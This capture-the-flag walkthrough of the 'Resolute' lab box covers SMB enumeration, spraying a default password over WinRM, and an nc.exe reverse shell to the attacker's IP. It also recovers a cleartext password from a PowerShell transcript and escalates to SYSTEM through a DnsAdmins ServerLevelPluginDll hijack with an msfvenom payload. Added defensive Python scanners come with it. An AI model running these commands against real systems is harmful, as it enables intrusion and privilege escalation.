Resolute – No Metasploit

Doing initial nmap recon, we get some lengthy output:

PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain?      syn-ack ttl 127
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-19 20:00:38Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49688/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49712/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
55190/tcp open  unknown      syn-ack ttl 127
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

So it looks like it’s a Windows box with quite a lot of ports open. My eye first caught ports 139/445. Running enum4linux against resolute gives some interesting information. I missed this the first time, but going back over everything line by line, I was able to find some really juicy info:

Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki

index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko    Name: Marko Novak    Desc: Account created. Password set to Welcome123!

Okay, so we see that Marko Novak’s account description says his password is set to Welcome123!. Trying this with evil-winrm to log in, we get an authentication failure. However, let’s think this through: this looks like the default password set for newly created users, so someone else may still be using it. Running down the user list, we try it with the user melanie:

sudo evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\...> cd .
*Evil-WinRM* PS C:\...> dir

So from here, I actually used PowerShell and uploaded nc.exe to get a more stable shell. Call me old-fashioned, but I just don’t like the Evil-WinRM shell.

PS C:\...> Start-Process 'C:\...\nc.exe' -ArgumentList '-e cmd.exe 10.10.14.22 443'

sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 53534
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\...>

I don’t remember quite why, but I ended up using Evil-WinRM’s shell anyway. It’s good to have a backup.

Looking around, we find an unusual file under C:\ called “PSTranscripts”. We found it by enumerating hidden files with dir -Force from the PowerShell prompt.

PS C:\...> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\...exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="... $(whoami) ... $env:computername ... ($pwd).Name ...
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\...exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063515
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: ryan Serv3r4Admin4cc123!
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: ryan Serv3r4Admin4cc123!
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515

Did you see it? ryan’s password is in the other transcript file! Password: Serv3r4Admin4cc123!
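Transcription logging is a good control, but as this transcript shows, it also records whatever credentials get typed into a command line, so transcript directories need the same review as any other secrets store. As an added Python example (not from the original writeup), the scanner below walks a PowerShell transcript in the layout shown above, extracts each recorded Invoke-Expression command, and flags credentials passed inline, such as a positional net use password or a ConvertTo-SecureString -AsPlainText value, reporting them redacted. The transcript excerpt, share, user and password values are constructed for the demo.

```python
import re
# Constructed excerpt in the layout of a PowerShell transcript; share, user and password
# values are invented for the demo, not the real file from the box.
SAMPLE_TRANSCRIPT = r'''**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs-example\backups ryan ExamplePass123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> ParameterBinding(Invoke-Expression): name="Command"; value="net use Y: \\fs-example\public * /user:megabank\svc"
>> ParameterBinding(Invoke-Expression): name="Command"; value="$s = ConvertTo-SecureString 'Hunter2-example' -AsPlainText -Force"
'''
CMD_START = re.compile(r'name="Command"; value="(.*)$')
SECURESTRING = re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?['\"]([^'\"]+)['\"].*-AsPlainText", re.I)

def extract_commands(transcript):
    """Yield (line_no, command); a value="..." may span lines, so buffer to the closing quote."""
    buf, start = None, 0
    for no, line in enumerate(transcript.splitlines(), 1):
        if buf is None:
            m = CMD_START.search(line)
            if not m:
                continue
            buf, start = [m.group(1)], no
        else:
            buf.append(line)
        if buf[-1].rstrip().endswith('"'):
            yield start, "\n".join(buf).rstrip()[:-1]
            buf = None

def net_use_inline_password(cmd):
    """net use <drive> <share> [password | *] [/user:...]: any positional token after the
    share other than '*' was typed in clear. Only the command's first line is parsed."""
    m = re.search(r"\bnet\s+use\s+(.*)", cmd, re.I)
    if not m:
        return None
    positional = [t for t in m.group(1).split() if not t.startswith("/")]
    extra = [t for t in positional[2:] if t != "*"]
    return extra[-1] if extra else None

def scan_transcript(transcript):
    """Return [(line_no, reason, redacted_secret)]; redaction keeps the report from re-leaking."""
    redact = lambda s: s[:2] + "*" * (len(s) - 2)
    findings = []
    for no, cmd in extract_commands(transcript):
        pw = net_use_inline_password(cmd)
        if pw:
            findings.append((no, "net use with inline password", redact(pw)))
        m = SECURESTRING.search(cmd)
        if m:
            findings.append((no, "ConvertTo-SecureString -AsPlainText", redact(m.group(1))))
    return findings
```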

Let’s try these creds with ryan:

Alright, time to look around. We enumerated the box, starting with basic stuff like whoami /groups:

PS C:\...> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

After a while, I came up with nothing. I used PowerUp.ps1 to find an interesting potential exploit:

HijackablePath : C:\...
AbuseFunction  : Write-HijackDll -OutputFile 'C:\...dll' -Command ...

This link actually helped me out a lot in understanding what to do next.

So, I created a malicious DLL:

kali@hyd3:~/Documents/htb/resolute$ msfvenom -p ... LHOST=10.10.14.22 LPORT=443 -a ... -f ... -o wlbsctrl.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 5120 bytes
Saved as: wlbsctrl.dll

Then I served it up on SMB:

kali@hyd3:~/Documents/htb/resolute$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py ROPNOP /home/kali/Documents/htb/resolute/
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

And I injected the DLL remotely (really cool new trick I didn’t know before):

PS C:\...> dnscmd.exe RESOLUTE /config /serverlevelplugindll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS C:\...> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
PS C:\...> sc.exe start dns

I then started the DNS process as seen above. With the listener on port 443, I caught an NT AUTHORITY\SYSTEM shell:

listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 52809
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\...>whoami
nt authority\system

C:\...>type C:\...txt
The system cannot find the file specified.

C:\...>cd C:\...

C:\...>type Desktop\root.txt
e1d94876a506850d0c20edb5W5e619c
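The dnscmd step works because the DNS service loads ServerLevelPluginDll as SYSTEM the next time it starts, and DnsAdmins membership (seen in ryan's whoami /groups output above) is enough to write that value; from the defender's side, that registry write is the event to alarm on. As an added Python example, not from the original writeup, the classifier below reads constructed Sysmon Event ID 13 (registry value set) records in exported-XML layout and raises an alert for any write to ServerLevelPluginDll, rated high when the path is a UNC share or sits outside System32. Hostnames, users, share and DLL names are invented for the demo.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
PLUGIN_SUFFIX = r"\services\dns\parameters\serverlevelplugindll"

# Constructed Sysmon Event ID 13 (registry value set) records in exported-XML layout.
# Host, user, share and DLL names are invented for the demo.
SAMPLE_EVENTS = r'''<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<Event><System><EventID>13</EventID><Computer>dc01.example.local</Computer></System><EventData>
<Data Name="EventType">SetValue</Data><Data Name="Image">C:\Windows\System32\dnscmd.exe</Data>
<Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll</Data>
<Data Name="Details">\\10.0.0.99\share\evil-example.dll</Data><Data Name="User">MEGABANK\ryan</Data>
</EventData></Event>
<Event><System><EventID>13</EventID><Computer>dc01.example.local</Computer></System><EventData>
<Data Name="EventType">SetValue</Data><Data Name="Image">C:\Windows\System32\dnscmd.exe</Data>
<Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters\EnableGlobalQueryBlockList</Data>
<Data Name="Details">DWORD (0x00000001)</Data><Data Name="User">MEGABANK\Administrator</Data>
</EventData></Event>
<Event><System><EventID>13</EventID><Computer>dc01.example.local</Computer></System><EventData>
<Data Name="EventType">SetValue</Data><Data Name="Image">C:\Windows\regedit.exe</Data>
<Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll</Data>
<Data Name="Details">C:\Windows\System32\vendorplugin-example.dll</Data><Data Name="User">MEGABANK\Administrator</Data>
</EventData></Event>
</Events>'''

def parse_events(xml_text):
    """Flatten each <Event> into a dict of its EventData fields plus EventID and Computer."""
    for ev in ET.fromstring(xml_text).iter(NS + "Event"):
        rec = {d.get("Name"): (d.text or "") for d in ev.iter(NS + "Data")}
        rec["EventID"] = int(ev.find(f"{NS}System/{NS}EventID").text)
        rec["Computer"] = ev.find(f"{NS}System/{NS}Computer").text
        yield rec

def classify_plugin_change(rec):
    """None if unrelated; otherwise (severity, reason). Any write to ServerLevelPluginDll is
    worth a ticket, because the DNS service loads that DLL as SYSTEM on its next start; a UNC
    or non-System32 path is the abuse pattern rather than a vendor plugin."""
    if rec["EventID"] != 13 or rec.get("EventType") != "SetValue":
        return None
    if not rec.get("TargetObject", "").lower().endswith(PLUGIN_SUFFIX):
        return None
    dll = rec.get("Details", "")
    who = f"{rec.get('User')} via {rec.get('Image')}"
    if dll.startswith("\\\\") or not dll.lower().startswith("c:\\windows\\system32\\"):
        return "high", f"ServerLevelPluginDll set to {dll} by {who}"
    return "medium", f"ServerLevelPluginDll set to {dll} by {who}; confirm against change records"

def alerts(xml_text):
    return [(r["Computer"], *v) for r in parse_events(xml_text) if (v := classify_plugin_change(r))]
```

Pair the alert with a DnsAdmins membership review: the group is what makes the write possible, so it should be nearly empty and audited like Domain Admins.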